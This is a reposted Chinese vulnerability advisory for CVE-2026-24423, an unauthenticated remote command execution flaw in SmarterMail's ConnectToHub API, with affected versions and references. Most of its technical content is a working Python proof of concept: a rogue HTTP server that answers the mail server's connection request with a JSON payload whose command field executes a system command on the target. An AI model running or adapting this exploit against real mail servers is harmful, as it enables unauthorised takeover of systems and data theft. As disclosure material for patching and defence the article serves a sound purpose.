文章总结: 本文披露了SmarterMail存在未经身份验证的远程命令执行漏洞CVE-2026-24423。漏洞源于ConnectToHubAPI未授权,攻击者可诱导服务器连接恶意服务端并执行任意系统命令。影响SmarterMail小于Build9511版本,可能导致系统完全接管。文中附带了Python编写的POC验证代码,建议相关用户立即升级修复。 综合评分: 75 文章分类: 漏洞POC,漏洞预警,WEB安全
CVE-2026-24423|SmarterMail未经身份验证的远程命令执行漏洞(POC)
alicy alicy
信安百科
2026年2月2日 09:02 河北
0x00 前言
SmarterMail是一款由SmarterTools公司开发的基于Windows平台的邮件服务器软件,专为中小型企业、教育机构及需要私有化部署的组织设计,提供完整的邮件通信解决方案。其核心定位是作为Microsoft Exchange的轻量级替代方案,无需依赖Active Directory,部署更灵活,运维成本更低。
0x01 漏洞描述
漏洞源于ConnectToHub API接口未对访问者进行身份验证。攻击者可通过构造特定请求,诱导SmarterMail服务器指向恶意HTTP服务器,进而向 SmarterMail返回恶意操作系统命令。
攻击者可以远程执行任意命令,完全控制受影响的系统,导致数据泄露、服务中断等严重后果。
0x02 CVE编号
CVE-2026-24423
0x03 影响版本
SmarterMail < Build 9511
0x04 漏洞详情
POC:
https://github.com/aavamin/CVE-2026-24423
#!/usr/bin/env python3from http.server import BaseHTTPRequestHandler, HTTPServerimport json
class Handler(BaseHTTPRequestHandler): def _send_json(self, code: int, obj: dict): data = json.dumps(obj).encode("utf-8") self.send_response(code) self.send_header("Content-Type", "application/json") self.send_header("Content-Length", str(len(data))) self.end_headers() self.wfile.write(data)
def do_POST(self): if self.path != "/web/api/node-management/setup-initial-connection": self._send_json(404, {"error": "not found", "path": self.path}) return
length = int(self.headers.get("Content-Length", "0")) body = self.rfile.read(length).decode("utf-8", errors="replace") print("[*] Received POST:", self.path) print("[*] Body:", body)
resp = { "ClusterID": "f0e12780-f462-4b51-a7db-149f1d56209c", "SharedSecret": "any-value", "TargetHubs": {"a": "b"}, "IsStandby": False, "SystemMount": { "Enabled": True, "ReadOnly": False, "MountPath": "C:\\\\", "CommandMount": "whoami > C:\\\\whoami.txt" }, "SystemAdminUsernames": ["admin"] } self._send_json(200, resp)
def main(): host = "0.0.0.0" port = 80 print(f"Serving on http://{host}:{port}") HTTPServer((host, port), Handler).serve_forever()
if __name__ == "__main__": main()#Powered by ChatGPT
0x05 参考链接
https://github.com/aavamin/CVE-2026-24423
https://www.smartertools.com/smartermail/release-notes/current
推荐阅读:
CVE-2026-23760|SmarterMail存在身份认证绕过漏洞可实现RCE(POC)
CVE-2026-21962|Oracle WebLogic Server身份认证绕过漏洞(POC)
CVE-2025-68645|Zimbra本地文件包含漏洞(POC)
Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持!!!
本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:信安百科 alicy alicy《CVE-2026-24423|SmarterMail未经身份验证的远程命令执行漏洞(POC)》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论